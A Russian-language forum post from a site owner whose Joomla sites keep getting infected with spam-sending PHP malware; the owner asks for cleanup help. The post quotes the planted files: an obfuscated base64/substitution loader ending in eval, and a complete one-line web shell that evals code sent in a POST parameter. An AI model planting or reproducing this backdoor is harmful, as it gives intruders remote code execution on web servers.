Всем привет!
Имеется около 10ти сайтов на Joomla распложенных на одном сервере
Каждый из них за день забивается php файлами с вирусом PCT4BA6ODSE, который рассылает спам от нашего сервера и периодически захламляет сайт тучами ненужных файлов
В интернете кроме как предложения сделать readonly и сменить пароли ничего стоящего не предлагают
Чистка зараженных файлов и удаление новых созданных уже мягко говоря задолбала
Примеры создающихся файлов, которые появляются спонтанно, названия у них в основном в виде define.php или define + и двузначное число + .php, или include.php, help.php, cache.php и т.д.
Содержание в основном такого рода:
<?php
function qoehwzxnn($rwks, $pbycg){$psnp = ''; for($i=0; $i < strlen($rwks); $i++){$psnp .= isset($pbycg[$rwks[$i]])? $pbycg[$rwks[$i]] : $rwks[$i];}
$ks="base64_decode";return $ks($psnp);}
$tdxprwhb = 'GrsKnj2Z04GHJEwFh6Azv4sB04JkQ6JZJkUUPWzPGrsKnj2Z04GHJEDR0c2sh9JRh9x97meFgUFe04JkQ6JBhojU'.
'Q6JtnC39PmeFgUFehEjt46wFQCjBQrsVn4GHxfqyfqAF0E3RhojBb4lshs2Tvo2kbf1DPWzPGrsKnj2Z04GHJEcTNu2sNrj'.
'Ob4wFQE3BbrsV0Ihzxfqyf1FF05eHbojkhEsRQs2OQEcUv4JsPuAdYu2CwjJWIY2g7fe9lIMU7Oe97fe9LfhFdfq1N'.
'UH1dfwk04x1LIAAh9JTNI1FgUH1dfwk04lQd9Jsh6jzbfJbCkJOnrjOnkJbdmt1xmzPdfAsvETRdrJThEYElu2sQolR'.
'0rYHhEjknCuzn4FsPfwk04xFPWzPBGHP09jKv6wFQEM1v6jZbr2V46lthosU46wT06xHJXwsN'.
+еще тучу строк+
yf5wk04lQd9Jsh6jzbfJbCkJOnrjOnkJbdmt1xWzPfojOnra1vouZ0Wvt4Ej'.
'KvE2q0ITZ04JFvCDFNoYHJXJshkqFgUHP04TFbf1FgU==';
$wtzvo = Array('1'=>'g', '0'=>'Z', '3'=>'5', '2'=>'9', '5'=>'i', '4'=>'X', '7'=>'L', '6'=>'3', '9'=>'n', '8'=>'r', 'A'=>'B', 'C'=>'W', 'B'=>'f', 'E'=>'2', 'D'=>'x', 'G'=>'Q', 'F'=>'p', 'I'=>'S', 'H'=>'o', 'K'=>'u', 'J'=>'J', 'M'=>'4', 'L'=>'P', 'O'=>'j', 'N'=>'e', 'Q'=>'b', 'P'=>'K', 'S'=>'6', 'R'=>'v', 'U'=>'w', 'T'=>'h', 'W'=>'T', 'V'=>'t', 'Y'=>'U', 'X'=>'H', 'Z'=>'z', 'a'=>'8', 'c'=>'1', 'b'=>'d', 'e'=>'A', 'd'=>'I', 'g'=>'O', 'f'=>'C', 'i'=>'q', 'h'=>'c', 'k'=>'y', 'j'=>'V', 'm'=>'D', 'l'=>'N', 'o'=>'m', 'n'=>'a', 'q'=>'k', 'p'=>'E', 's'=>'l', 'r'=>'G', 'u'=>'F', 't'=>'0', 'w'=>'R', 'v'=>'Y', 'y'=>'7', 'x'=>'M', 'z'=>'s');
eval(qoehwzxnn($tdxprwhb, $wtzvo));?>
или
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['nf03c87'])) {eval($s21(${$s20}['nf03c87']));}?>
или такой же код только уже в существующих файлах в самом начале.
Англоязычные форумы говорят что это уязвимость каких то бесплатных плагинов или плагины со сладейром
Помогите пожалуйста кто чем может!! ! ! !
Выложу всю необходимую инфу